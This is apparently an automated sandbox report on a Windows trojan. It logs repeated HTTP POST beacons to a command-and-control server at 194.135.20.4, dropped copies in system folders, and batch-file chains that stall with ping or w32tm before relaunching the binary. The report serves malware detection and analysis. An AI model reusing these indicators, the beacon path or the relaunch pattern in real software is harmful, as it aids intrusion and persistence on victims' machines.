                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.55 Safari/537.36 Edg/96.0.1054.34 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Edg/96.0.1054.29 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: unknown TCP traffic detected without corresponding DNS query: 194.135.20.4
                            Source: unknown HTTP traffic detected: POST /8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3PacketBase/DownloadsApiPublicTo/3TempcdnPublic/private8ToWp/58cpuasync/26Api/javascriptJs/javascript/default/eternalImageProvider/EternalTopollpacketlowapiprotectTrafficWordpress.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 194.135.20.4 Content-Length: 344 Expect: 100-continue Connection: Keep-Alive
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:47:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:48:03 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:48:15 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:48:25 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:48:35 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:48:48 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:48:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:49:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:49:23 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:49:32 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: global traffic HTTP traffic detected: HTTP/1.1 100 Continue Data Ascii: HTTP/1.1 404 Not Found Date: Sat, 02 Nov 2024 16:49:45 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 274 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at 194.135.20.4 Port 80</address></body></html>
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.00000000032F6000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.0000000003109000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003436000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002DD9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003AE3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://194.135.20.4
                            Source: wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002F91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://194.135.20.4/8/traffic/DumpprivateWp2/Bigload8/downloadsGame/TemporaryMulti6/WpLinux/line1/3P
                            Source: teh76E2k50.exe, 00000000.00000002.2305640506.00000000033D9000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000007.00000002.2457880910.0000000003248000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000000E.00000002.2623891999.000000000305B000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003519000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000014.00000002.2734545829.0000000003A63000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000001A.00000002.2832013910.0000000003388000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000020.00000002.2928116039.0000000002D28000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.0000000002FD3000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000026.00000002.3063760683.00000000034CF000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 0000002C.00000002.3170462126.000000000392C000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000032.00000002.3290140159.0000000003A34000.00000004.00000800.00020000.00000000.sdmp, wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe, 00000038.00000002.3449359568.0000000002EDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File created: C:\Windows\SchCache\sihost.exe
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File created: C:\Windows\SchCache\sihost.exe\:Zone.Identifier:$DATA
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File created: C:\Windows\SchCache\66fc9ff0ee96c2
                            Source: Joe Sandbox View Dropped File: C:\Users\user\Desktop\AQotzTRR.log CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                            Source: teh76E2k50.exe, 00000000.00000002.2337912560.000000001BC62000.00000002.00000001.01000000.00000000.sdmp Binary or memory string: OriginalFilenameq944h9VdeekiaLj6nIEA0nxdMfYwMGO54 vs teh76E2k50.exe
                            Source: teh76E2k50.exe, 00000000.00000002.2338728204.000000001BD8C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameCmd.Exe.MUIj% vs teh76E2k50.exe
                            Source: teh76E2k50.exe Binary or memory string: OriginalFilenameVisualStudio.Shell.Framework.dll$ vs teh76E2k50.exe
                            Source: teh76E2k50.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: teh76E2k50.exe, mD10jnSFKu6YL9mCDNG.cs Cryptographic APIs: 'CreateDecryptor'
                            Source: classification engine Classification label: mal100.troj.evad.winEXE@88/326@0/1
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File created: C:\Program Files\Windows Mail\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File created: C:\Users\user\Desktop\SEWrteSu.log
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Mutant created: NULL
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2656:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5136:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5840:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1860:120:WilError_03
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\2d062fa903e8d66abace64e65a2d2f72654506766e417b5e44d013eab6e9c74a
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6480:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4228:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2272:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6156:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5796:120:WilError_03
                            Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5052:120:WilError_03
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File created: C:\Users\user\AppData\Local\Temp\d42RoYfj2g
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
                            Source: teh76E2k50.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: teh76E2k50.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File read: C:\Users\desktop.ini
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                            Source: teh76E2k50.exe ReversingLabs: Detection: 71%
                            Source: C:\Users\user\Desktop\teh76E2k50.exe File read: C:\Users\user\Desktop\teh76E2k50.exe
                            Source: unknown Process created: C:\Users\user\Desktop\teh76E2k50.exe "C:\Users\user\Desktop\teh76E2k50.exe"
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\uHdcbfRrII.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ybJBPcXt9a.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\znx0BCuWHE.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\8JExSyzmRo.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ibWrXDwbZz.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\tOMWzubzd4.bat"
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\yFJPVaLwHB.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\dxSYZSKoEG.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\w32tm.exe w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe "C:\Users\user\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exe"
                            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\wWhNbrYwddCvdSpzVqsrxxXMBVnGlS.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\TCMSovEgtl.bat"
                            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Users\user\Desktop\teh76E2k50.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\HL35FbYWw1.bat"
